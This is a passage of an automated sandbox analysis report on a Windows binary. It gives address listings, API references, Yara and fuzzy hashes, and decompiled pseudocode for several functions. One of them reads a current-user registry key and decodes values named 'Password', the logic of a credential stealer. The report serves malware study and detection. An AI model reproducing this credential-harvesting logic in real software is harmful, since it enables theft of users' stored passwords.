                                                                                                                              0x00421d2b
                                                                                                                              0x00421d33
                                                                                                                              0x00421d43
                                                                                                                              0x00421d44
                                                                                                                              0x00421d49
                                                                                                                              0x00421d4c
                                                                                                                              0x00421d5e
                                                                                                                              0x00421d67
                                                                                                                              0x00421d67
                                                                                                                              0x00421d77
                                                                                                                              0x00421d7a
                                                                                                                              0x00421d81
                                                                                                                              0x00421d94
                                                                                                                              0x00421d9a
                                                                                                                              0x00421dba
                                                                                                                              0x00421dc0
                                                                                                                              0x00421dd5
                                                                                                                              0x00421dd8
                                                                                                                              0x00421dde
                                                                                                                              0x00421dea
                                                                                                                              0x00421df0
                                                                                                                              0x00421e0b
                                                                                                                              0x00421e17
                                                                                                                              0x00421e18
                                                                                                                              0x00421e20
                                                                                                                              0x00421e2c
                                                                                                                              0x00421e50
                                                                                                                              0x00421e61
                                                                                                                              0x00421e6d
                                                                                                                              0x00421e6e
                                                                                                                              0x00421e73
                                                                                                                              0x00421e82
                                                                                                                              0x00421e82
                                                                                                                              0x00421e85
                                                                                                                              0x00421e95
                                                                                                                              0x00421e9c
                                                                                                                              0x00421eb1
                                                                                                                              0x00421eb6
                                                                                                                              0x00421eb9
                                                                                                                              0x00421ebe
                                                                                                                              0x00421ec5
                                                                                                                              0x00421ec6
                                                                                                                              0x00421ecb
                                                                                                                              0x00421ed4
                                                                                                                              0x00421eda
                                                                                                                              0x00421ee4
                                                                                                                              0x00421eee
                                                                                                                              0x00421f13
                                                                                                                              0x00421f20
                                                                                                                              0x00421f26
                                                                                                                              0x00421f2d
                                                                                                                              0x00421f3d
                                                                                                                              0x00421f42
                                                                                                                              0x00421f51
                                                                                                                              0x00421f56
                                                                                                                              0x00421f59
                                                                                                                              0x00421f65
                                                                                                                              0x00421f6b
                                                                                                                              0x00421f9b
                                                                                                                              0x00421fa1
                                                                                                                              0x00421fa8
                                                                                                                              0x00421fad
                                                                                                                              0x00421fb7
                                                                                                                              0x00421fc3
                                                                                                                              0x00421fc9
                                                                                                                              0x00421fd0
                                                                                                                              0x00421fe5
                                                                                                                              0x00421ff2
                                                                                                                              0x00421ff7
                                                                                                                              0x00421ffa
                                                                                                                              0x00422006
                                                                                                                              0x0042200c
                                                                                                                              0x00422016
                                                                                                                              0x0042207b
                                                                                                                              0x00422088
                                                                                                                              0x00422097
                                                                                                                              0x0042209d
                                                                                                                              0x004220a0
                                                                                                                              0x004220bc
                                                                                                                              0x004220c8
                                                                                                                              0x004220d1
                                                                                                                              0x004220dd
                                                                                                                              0x00422102
                                                                                                                              0x00422113
                                                                                                                              0x0042211f
                                                                                                                              0x00422120
                                                                                                                              0x00422125
                                                                                                                              0x00422134
                                                                                                                              0x00422134
                                                                                                                              0x0042215f
                                                                                                                              0x00422164
                                                                                                                              0x00422176
                                                                                                                              0x00422176
                                                                                                                              0x0042217f
                                                                                                                              0x0042218c
                                                                                                                              0x004221a6
                                                                                                                              0x004221a6
                                                                                                                              0x00421fd0
                                                                                                                              0x004221ba
                                                                                                                              0x004221ba
                                                                                                                              0x00421f2d
                                                                                                                              0x00421f20
                                                                                                                              0x004221ce
                                                                                                                              0x004221e1
                                                                                                                              0x004221f6

                                                                                                                              APIs
                                                                                                                              • InternetReadFile.WININET(0042280B,?,000003E8,00000000), ref: 00421DBA
                                                                                                                              • _memset.LIBCMT ref: 00421EB1
                                                                                                                                • Part of subcall function 00421BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00421C32
                                                                                                                                • Part of subcall function 00421BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,0042654F,000000FF,0E687535,?,?,?,?,?,?,?,00000000,0042654F), ref: 00421C79
                                                                                                                              • _memcpy_s.LIBCMT ref: 00422102
                                                                                                                              • _memcpy_s.LIBCMT ref: 0042215F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide_memcpy_s$FileInternetRead_memset
                                                                                                                              • String ID: text
                                                                                                                              • API String ID: 573529796-999008199
                                                                                                                              • Opcode ID: 56cc44a652979a3dfb6213643a8babb117dafe26a23d7cc4f79d7bd809ac16db
                                                                                                                              • Instruction ID: b5d8de66111580073d5011e1a7dbd941f0c671664ab485ed23b031e4cb8c210f
                                                                                                                              • Opcode Fuzzy Hash: 56cc44a652979a3dfb6213643a8babb117dafe26a23d7cc4f79d7bd809ac16db
                                                                                                                              • Instruction Fuzzy Hash: 10F114B5A002289FDB24CF58CC80BDAB7B5BF49304F5082D9E509AB391D775AE81CF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041EF60, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175registrymemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 66%
                                                                                                                              			E0041EF60(void* __ebx, int* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a8, char* _a12) {
				int _v8;
				char _v16;
				int _v20;
				char _v36;
				signed int _v40;
				char _v1064;
				char _v1068;
				char _v2096;
				char _v2100;
				char _v3128;
				char _v3132;
				int _v3136;
				char _v3144;
				intOrPtr _v3148;
				char _v3176;
				char _v3204;
				char _v3208;
				signed int _v3212;
				int* _v3216;
				signed int _t78;
				signed int _t79;
				long _t83;
				intOrPtr _t87;
				void* _t106;
				void* _t118;
				void* _t160;
				void* _t161;
				signed int _t162;
				void* _t163;
				void* _t164;
				void* _t165;

				_t161 = __esi;
				_t160 = __edi;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(E0042662F);
				_push( *[fs:0x0]);
				_t164 = _t163 - 0xc80;
				_t78 =  *0x4301f4; // 0xe687535
				_t79 = _t78 ^ _t162;
				_v40 = _t79;
				_push(_t79);
				 *[fs:0x0] =  &_v16;
				_v3216 = __ecx;
				_v3212 = 0;
				E00402DD0( &_v36);
				_v8 = 0;
				 *_v3216 = 0;
				_v20 = 0;
				_t149 = _a12;
				_t83 = RegOpenKeyExA(0x80000001, _a12, 0, 0x20019,  &_a8); // executed
				if(_t83 != 0) {
					E00402E00(_a4,  &_v36);
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00402E80( &_v36);
					_t87 = _a4;
					goto L15;
				} else {
					_v3136 = 0;
					_v3132 = 0xff;
					_v1068 = 3;
					_v2096 = 0;
					while(1) {
						_push( &_v2100);
						_push( &_v1064);
						_push( &_v1068);
						_push(0);
						_push( &_v3132);
						_push( &_v2096);
						_push(_v3136);
						_push(_a8);
						if( *0x432874() != 0) {
							break;
						}
						E00402D70( &_v3208);
						_v8 = 1;
						E00401EA0( &_v3204,  &_v2096);
						_v3208 = _v1068;
						_v3148 = _v2100;
						if(_v1068 != 3) {
							if(_v1068 != 1) {
								if(_v1068 == 4) {
									_v3144 = _v1064;
								}
							} else {
								E00401EA0( &_v3176,  &_v1064);
							}
						} else {
							_t106 = E00402D10( &_v2096, "Password");
							_t165 = _t164 + 8;
							if(_t106 == 0) {
								E004038E0( &_v1064,  &_v1064, "%S",  &_v1064);
								_t164 = _t165 + 0xc;
								E00401EA0( &_v3176,  &_v1064);
							} else {
								_v20 = E0041EED0( &_v1064, _v2100);
								E004038C0( &_v3128, _v20);
								 *0x4328f0(GetProcessHeap(), 0, _v20);
								E00401EA0( &_v3176,  &_v3128);
								E004038C0( &_v3128, 0x429491);
								_t164 = _t165 + 0x18;
							}
						}
						 *_v3216 =  *_v3216 + 1;
						E00402EC0( &_v36,  &_v3208);
						_v3132 = 0x400;
						_v2100 = 0x400;
						_v3136 = _v3136 + 1;
						_v8 = 0;
						E00402DA0( &_v3208);
					}
					E00402E00(_a4,  &_v36);
					_t149 = _v3212 | 0x00000001;
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00402E80( &_v36);
					_t87 = _a4;
					L15:
					 *[fs:0x0] = _v16;
					return E00404354(_t87, _t118, _v40 ^ _t162, _t149, _t160, _t161);
				}
			}


































                                                                                                                              0x0041ef60
                                                                                                                              0x0041ef60
                                                                                                                              0x0041ef60
                                                                                                                              0x0041ef63
                                                                                                                              0x0041ef65
                                                                                                                              0x0041ef70
                                                                                                                              0x0041ef71
                                                                                                                              0x0041ef77
                                                                                                                              0x0041ef7c
                                                                                                                              0x0041ef7e
                                                                                                                              0x0041ef81
                                                                                                                              0x0041ef85
                                                                                                                              0x0041ef8b
                                                                                                                              0x0041ef91
                                                                                                                              0x0041ef9e
                                                                                                                              0x0041efa3
                                                                                                                              0x0041efb0
                                                                                                                              0x0041efb6
                                                                                                                              0x0041efc8
                                                                                                                              0x0041efd1
                                                                                                                              0x0041efd9
                                                                                                                              0x0041f1f7
                                                                                                                              0x0041f205
                                                                                                                              0x0041f20b
                                                                                                                              0x0041f215
                                                                                                                              0x0041f21a
                                                                                                                              0x00000000
                                                                                                                              0x0041efdf
                                                                                                                              0x0041efdf
                                                                                                                              0x0041efe9
                                                                                                                              0x0041eff3
                                                                                                                              0x0041effd
                                                                                                                              0x0041f004
                                                                                                                              0x0041f00a
                                                                                                                              0x0041f011
                                                                                                                              0x0041f018
                                                                                                                              0x0041f019
                                                                                                                              0x0041f021
                                                                                                                              0x0041f028
                                                                                                                              0x0041f02f
                                                                                                                              0x0041f033
                                                                                                                              0x0041f03c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041f048
                                                                                                                              0x0041f04d
                                                                                                                              0x0041f05e
                                                                                                                              0x0041f069
                                                                                                                              0x0041f075
                                                                                                                              0x0041f082
                                                                                                                              0x0041f13d
                                                                                                                              0x0041f15a
                                                                                                                              0x0041f162
                                                                                                                              0x0041f162
                                                                                                                              0x0041f13f
                                                                                                                              0x0041f14c
                                                                                                                              0x0041f14c
                                                                                                                              0x0041f088
                                                                                                                              0x0041f094
                                                                                                                              0x0041f099
                                                                                                                              0x0041f09e
                                                                                                                              0x0041f11a
                                                                                                                              0x0041f11f
                                                                                                                              0x0041f12f
                                                                                                                              0x0041f0a0
                                                                                                                              0x0041f0b6
                                                                                                                              0x0041f0c4
                                                                                                                              0x0041f0d9
                                                                                                                              0x0041f0ec
                                                                                                                              0x0041f0fd
                                                                                                                              0x0041f102
                                                                                                                              0x0041f102
                                                                                                                              0x0041f134
                                                                                                                              0x0041f179
                                                                                                                              0x0041f185
                                                                                                                              0x0041f18a
                                                                                                                              0x0041f194
                                                                                                                              0x0041f1a7
                                                                                                                              0x0041f1ad
                                                                                                                              0x0041f1b7
                                                                                                                              0x0041f1b7
                                                                                                                              0x0041f1c8
                                                                                                                              0x0041f1d3
                                                                                                                              0x0041f1d6
                                                                                                                              0x0041f1dc
                                                                                                                              0x0041f1e6
                                                                                                                              0x0041f1eb
                                                                                                                              0x0041f21d
                                                                                                                              0x0041f220
                                                                                                                              0x0041f235
                                                                                                                              0x0041f235

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0041EFD1
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F0D2
                                                                                                                                • Part of subcall function 004038E0: _vswprintf_s.LIBCMT ref: 004038FB
                                                                                                                              • task.LIBCPMTD ref: 0041F1E6
                                                                                                                              • task.LIBCPMTD ref: 0041F215
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: task$HeapOpenProcess_vswprintf_s
                                                                                                                              • String ID: Password
                                                                                                                              • API String ID: 1102310772-3434357891
                                                                                                                              • Opcode ID: 457a01965bc8a16e7e646d1f490dd91e8be1590f6004a9f66447c92fd646dc42
                                                                                                                              • Instruction ID: 7ef44c43e58b29f017847e03fa3b9e536e5a51fabef7b537324a8127fa539a65
                                                                                                                              • Opcode Fuzzy Hash: 457a01965bc8a16e7e646d1f490dd91e8be1590f6004a9f66447c92fd646dc42
                                                                                                                              • Instruction Fuzzy Hash: E9712BB19102189BDB24DF54CD91FDEB7B4BB48314F5082AAE50967281DF786F88CF98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404E60, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E00404E60(void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v0;
				char* _v8;
				char _v20;
				void* _t26;
				signed int _t27;
				signed int _t30;
				intOrPtr* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr* _t35;
				signed int _t41;
				signed int _t46;
				signed int _t52;
				signed int _t53;
				void* _t56;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t64;
				void* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;

				_t65 = __esi;
				_t61 = __edi;
				while(1) {
					_t26 = E0040537B(_t56, _t61, _t65, _a4); // executed
					if(_t26 != 0) {
						break;
					}
					_t27 = E00408F17(_t26, _a4);
					__eflags = _t27;
					if(_t27 == 0) {
						__eflags =  *0x4310ec & 0x00000001;
						if(( *0x4310ec & 0x00000001) == 0) {
							 *0x4310ec =  *0x4310ec | 0x00000001;
							__eflags =  *0x4310ec;
							_push(1);
							_v8 = "bad allocation";
							E0040465A(0x4310e0,  &_v8);
							 *0x4310e0 = 0x427240;
							E00404DED( *0x4310ec, 0x42690f);
						}
						_t46 =  &_v20;
						E00404770(_t46, 0x4310e0);
						_v20 = 0x427240;
						_t30 = E00407185( &_v20, 0x42e190);
						asm("int3");
						_push(0x427240);
						_t67 = _t46;
						_t41 = 0;
						__eflags = _t67;
						if(__eflags != 0) {
							_push(0x4310e0);
							__eflags = _v0;
							if(__eflags > 0) {
								__eflags = _a8;
								 *_t67 = 0;
								__eflags = _v0 - (0 | _a8 != 0x00000000) + 1;
								if(__eflags > 0) {
									__eflags = _a4 + 0xfffffffe - 0x22;
									if(__eflags > 0) {
										goto L10;
									} else {
										_t52 = _t67;
										__eflags = _a8;
										if(_a8 != 0) {
											_t41 = 1;
											__eflags = 1;
											 *_t67 = 0x2d;
											_t52 = _t67 + 1;
											_t30 =  ~_t30;
										}
										_t64 = _t52;
										do {
											_t20 = _t30 % _a4;
											_t30 = _t30 / _a4;
											_t58 = _t20;
											__eflags = _t58 - 9;
											if(_t58 <= 9) {
												_t59 = _t58 + 0x30;
												__eflags = _t59;
											} else {
												_t59 = _t58 + 0x57;
											}
											 *_t52 = _t59;
											_t52 = _t52 + 1;
											_t41 = _t41 + 1;
											__eflags = _t30;
											if(_t30 != 0) {
												goto L22;
											}
											break;
											L22:
											__eflags = _t41 - _v0;
										} while (_t41 < _v0);
										__eflags = _t41 - _v0;
										if(__eflags < 0) {
											 *_t52 = 0;
											_t53 = _t52 - 1;
											__eflags = _t53;
											do {
												_t34 =  *_t53;
												 *_t53 =  *_t64;
												_t53 = _t53 - 1;
												 *_t64 = _t34;
												_t64 = _t64 + 1;
												__eflags = _t64 - _t53;
											} while (_t64 < _t53);
											_t33 = 0;
											__eflags = 0;
										} else {
											 *_t67 = 0;
											goto L13;
										}
									}
								} else {
									L13:
									_t31 = E00405A49(__eflags);
									_push(0x22);
									goto L11;
								}
							} else {
								L10:
								_t31 = E00405A49(__eflags);
								_push(0x16);
								L11:
								_pop(_t68);
								 *_t31 = _t68;
								E00407461();
								_t33 = _t68;
							}
						} else {
							_t35 = E00405A49(__eflags);
							_t70 = 0x16;
							 *_t35 = _t70;
							E00407461();
							_t33 = _t70;
						}
						return _t33;
					} else {
						continue;
					}
					L30:
				}
				return _t26;
				goto L30;
			}


























                                                                                                                              0x00404e60
                                                                                                                              0x00404e60
                                                                                                                              0x00404e77
                                                                                                                              0x00404e7a
                                                                                                                              0x00404e82
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404e6d
                                                                                                                              0x00404e73
                                                                                                                              0x00404e75
                                                                                                                              0x00404e86
                                                                                                                              0x00404e97
                                                                                                                              0x00404e99
                                                                                                                              0x00404e99
                                                                                                                              0x00404ea0
                                                                                                                              0x00404ea8
                                                                                                                              0x00404eaf
                                                                                                                              0x00404eb9
                                                                                                                              0x00404ebf
                                                                                                                              0x00404ec4
                                                                                                                              0x00404ec6
                                                                                                                              0x00404ec9
                                                                                                                              0x00404ed7
                                                                                                                              0x00404eda
                                                                                                                              0x00404edf
                                                                                                                              0x00404ee6
                                                                                                                              0x00404ee7
                                                                                                                              0x00404ee9
                                                                                                                              0x00404eeb
                                                                                                                              0x00404eed
                                                                                                                              0x00404f05
                                                                                                                              0x00404f06
                                                                                                                              0x00404f09
                                                                                                                              0x00404f20
                                                                                                                              0x00404f23
                                                                                                                              0x00404f29
                                                                                                                              0x00404f2c
                                                                                                                              0x00404f3d
                                                                                                                              0x00404f40
                                                                                                                              0x00000000
                                                                                                                              0x00404f42
                                                                                                                              0x00404f42
                                                                                                                              0x00404f44
                                                                                                                              0x00404f47
                                                                                                                              0x00404f4b
                                                                                                                              0x00404f4b
                                                                                                                              0x00404f4c
                                                                                                                              0x00404f4f
                                                                                                                              0x00404f52
                                                                                                                              0x00404f52
                                                                                                                              0x00404f54
                                                                                                                              0x00404f56
                                                                                                                              0x00404f58
                                                                                                                              0x00404f58
                                                                                                                              0x00404f58
                                                                                                                              0x00404f5b
                                                                                                                              0x00404f5e
                                                                                                                              0x00404f65
                                                                                                                              0x00404f65
                                                                                                                              0x00404f60
                                                                                                                              0x00404f60
                                                                                                                              0x00404f60
                                                                                                                              0x00404f68
                                                                                                                              0x00404f6a
                                                                                                                              0x00404f6b
                                                                                                                              0x00404f6c
                                                                                                                              0x00404f6e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404f70
                                                                                                                              0x00404f70
                                                                                                                              0x00404f70
                                                                                                                              0x00404f75
                                                                                                                              0x00404f78
                                                                                                                              0x00404f7f
                                                                                                                              0x00404f82
                                                                                                                              0x00404f82
                                                                                                                              0x00404f83
                                                                                                                              0x00404f85
                                                                                                                              0x00404f87
                                                                                                                              0x00404f89
                                                                                                                              0x00404f8a
                                                                                                                              0x00404f8c
                                                                                                                              0x00404f8d
                                                                                                                              0x00404f8d
                                                                                                                              0x00404f91
                                                                                                                              0x00404f91
                                                                                                                              0x00404f7a
                                                                                                                              0x00404f7a
                                                                                                                              0x00000000
                                                                                                                              0x00404f7a
                                                                                                                              0x00404f78
                                                                                                                              0x00404f2e
                                                                                                                              0x00404f2e
                                                                                                                              0x00404f2e
                                                                                                                              0x00404f33
                                                                                                                              0x00000000
                                                                                                                              0x00404f33
                                                                                                                              0x00404f0b
                                                                                                                              0x00404f0b
                                                                                                                              0x00404f0b
                                                                                                                              0x00404f10
                                                                                                                              0x00404f12
                                                                                                                              0x00404f12
                                                                                                                              0x00404f13
                                                                                                                              0x00404f15
                                                                                                                              0x00404f1a
                                                                                                                              0x00404f1a
                                                                                                                              0x00404eef
                                                                                                                              0x00404eef
                                                                                                                              0x00404ef6
                                                                                                                              0x00404ef7
                                                                                                                              0x00404ef9
                                                                                                                              0x00404efe
                                                                                                                              0x00404efe
                                                                                                                              0x00404f97
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404e75
                                                                                                                              0x00404e85
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 00404E7A
                                                                                                                                • Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
                                                                                                                                • Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
                                                                                                                                • Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0
                                                                                                                              • std::exception::exception.LIBCMT ref: 00404EAF
                                                                                                                              • std::exception::exception.LIBCMT ref: 00404EC9
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00404EDA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                              • String ID: bad allocation
                                                                                                                              • API String ID: 615853336-2104205924
                                                                                                                              • Opcode ID: f7e149e728e047be5dca35d84d0fe1e3c74d55aedd66a1347a89cf90e19c28e4
                                                                                                                              • Instruction ID: 9bbe11233907508109f1d33bbef5e55f2094a22d509f4e7785995bdd5fe01e58
                                                                                                                              • Opcode Fuzzy Hash: f7e149e728e047be5dca35d84d0fe1e3c74d55aedd66a1347a89cf90e19c28e4
                                                                                                                              • Instruction Fuzzy Hash: D2F02DB1A00559A6CB04FB67DC12B6E3779BB80358F50403FF911B61E1DB7D9A418BAC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041DCA0, Relevance: 7.8, APIs: 5, Instructions: 286fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File_fprintf$CopyDelete__fsopen_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2207039828-0
                                                                                                                              • Opcode ID: d8b20109aa66b115ba5ea3117337ceb65497a12725fdff501180ec977d61706c
                                                                                                                              • Instruction ID: c88c65ffe1260dd4c76004f7af897511baf4b03775390616ead9ee4b2e68dc4a
                                                                                                                              • Opcode Fuzzy Hash: d8b20109aa66b115ba5ea3117337ceb65497a12725fdff501180ec977d61706c
                                                                                                                              • Instruction Fuzzy Hash: BDC10CB1E042189FCB64DF68DD88BDEB7B5EB48301F0482E9E509A7290D7759E84CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041DA80, Relevance: 7.7, APIs: 5, Instructions: 157fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0041DAC6
                                                                                                                              • _memset.LIBCMT ref: 0041DADA
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0041DC86
                                                                                                                                • Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8
                                                                                                                                • Part of subcall function 0041D730: _memset.LIBCMT ref: 0041D7A4
                                                                                                                              • _fprintf.LIBCMT ref: 0041DC2D
                                                                                                                              • _fprintf.LIBCMT ref: 0041DC49
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File_fprintf_memset$CopyDelete__fsopen__ftbuf__lock_file__output_l__stbuf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4033937950-0
                                                                                                                              • Opcode ID: 0df1f39b027009ee0bfd2bba978dc354717e4cc43626b7785597751fa8d3c681
                                                                                                                              • Instruction ID: b7e754361677a1f3ef2fd7e3f9e65c1c63799f8599065462e7f6851c09d7b54f
                                                                                                                              • Opcode Fuzzy Hash: 0df1f39b027009ee0bfd2bba978dc354717e4cc43626b7785597751fa8d3c681
                                                                                                                              • Instruction Fuzzy Hash: A35184B1D00204ABCB14EFA4DD89FDE7378FB48305F0445A9F609A7290D775AA84CFA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00412CB0, Relevance: 7.7, APIs: 5, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00412CB0(intOrPtr __ecx, void* _a4, long _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				CHAR* _v16;
				long _v20;
				intOrPtr _v24;
				void* _t103;

				_v24 = __ecx;
				if( *(_v24 + 4) != 0 ||  *(_v24 + 0xc) != 0 ||  *((intOrPtr*)(_v24 + 0x20)) != 0 ||  *((intOrPtr*)(_v24 + 0x18)) != 0 ||  *((intOrPtr*)(_v24 + 0x14)) != 0 || ( *(_v24 + 0x2c) & 0x000000ff) != 0) {
					return 0x1000000;
				} else {
					if(_a12 != 1) {
						if(_a12 != 2) {
							if(_a12 != 3) {
								return 0x10000;
							}
							_v20 = _a8;
							if(_v20 != 0) {
								if(_a4 == 0) {
									 *(_v24 + 0xc) = CreateFileMappingA(0xffffffff, 0, 4, 0, _v20, 0);
									if( *(_v24 + 0xc) != 0) {
										 *((intOrPtr*)(_v24 + 0x20)) = MapViewOfFile( *(_v24 + 0xc), 0xf001f, 0, 0, _v20);
										if( *((intOrPtr*)(_v24 + 0x20)) != 0) {
											L25:
											 *(_v24 + 0x1c) = 1;
											 *(_v24 + 0x24) = 0;
											 *(_v24 + 0x28) = _v20;
											return 0;
										}
										CloseHandle( *(_v24 + 0xc));
										 *(_v24 + 0xc) = 0;
										return 0x300;
									}
									return 0x300;
								}
								 *((intOrPtr*)(_v24 + 0x20)) = _a4;
								goto L25;
							}
							return 0x30000;
						}
						_v16 = _a4;
						_t103 = CreateFileA(_v16, 0x40000000, 0, 0, 2, 0x80, 0); // executed
						 *(_v24 + 4) = _t103;
						if( *(_v24 + 4) != 0xffffffff) {
							 *(_v24 + 0x1c) = 1;
							 *(_v24 + 0x10) = 0;
							 *((char*)(_v24 + 8)) = 1;
							return 0;
						}
						 *(_v24 + 4) = 0;
						return 0x200;
					}
					_v12 = _a4;
					 *(_v24 + 4) = _v12;
					 *((char*)(_v24 + 8)) = 0;
					_v8 = SetFilePointer( *(_v24 + 4), 0, 0, 1);
					 *(_v24 + 0x1c) = 0 | _v8 != 0xffffffff;
					if(( *(_v24 + 0x1c) & 0x000000ff) == 0) {
						 *(_v24 + 0x10) = 0;
					} else {
						 *(_v24 + 0x10) = _v8;
					}
					return 0;
				}
			}









                                                                                                                              0x00412cb6
                                                                                                                              0x00412cc0
                                                                                                                              0x00000000
                                                                                                                              0x00412cfb
                                                                                                                              0x00412cff
                                                                                                                              0x00412d6c
                                                                                                                              0x00412ddb
                                                                                                                              0x00000000
                                                                                                                              0x00412e99
                                                                                                                              0x00412de4
                                                                                                                              0x00412deb
                                                                                                                              0x00412dfb
                                                                                                                              0x00412e1f
                                                                                                                              0x00412e29
                                                                                                                              0x00412e4f
                                                                                                                              0x00412e59
                                                                                                                              0x00412e79
                                                                                                                              0x00412e7c
                                                                                                                              0x00412e83
                                                                                                                              0x00412e90
                                                                                                                              0x00000000
                                                                                                                              0x00412e93
                                                                                                                              0x00412e62
                                                                                                                              0x00412e6b
                                                                                                                              0x00000000
                                                                                                                              0x00412e72
                                                                                                                              0x00000000
                                                                                                                              0x00412e2b
                                                                                                                              0x00412e03
                                                                                                                              0x00000000
                                                                                                                              0x00412e03
                                                                                                                              0x00000000
                                                                                                                              0x00412ded
                                                                                                                              0x00412d71
                                                                                                                              0x00412d8a
                                                                                                                              0x00412d93
                                                                                                                              0x00412d9d
                                                                                                                              0x00412db6
                                                                                                                              0x00412dbd
                                                                                                                              0x00412dc7
                                                                                                                              0x00000000
                                                                                                                              0x00412dcb
                                                                                                                              0x00412da2
                                                                                                                              0x00000000
                                                                                                                              0x00412da9
                                                                                                                              0x00412d04
                                                                                                                              0x00412d0d
                                                                                                                              0x00412d13
                                                                                                                              0x00412d2a
                                                                                                                              0x00412d39
                                                                                                                              0x00412d45
                                                                                                                              0x00412d55
                                                                                                                              0x00412d47
                                                                                                                              0x00412d4d
                                                                                                                              0x00412d4d
                                                                                                                              0x00000000
                                                                                                                              0x00412d5c

                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00412D24
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 9201f6ce15df5f6a9cd88ef2443e8a01273e9c839cdc465c899d99a4fb38a6a3
                                                                                                                              • Instruction ID: 9f322006b0220ea05afb56398c9dc9dfda6680702410ea0cdaf2bbb192debffe
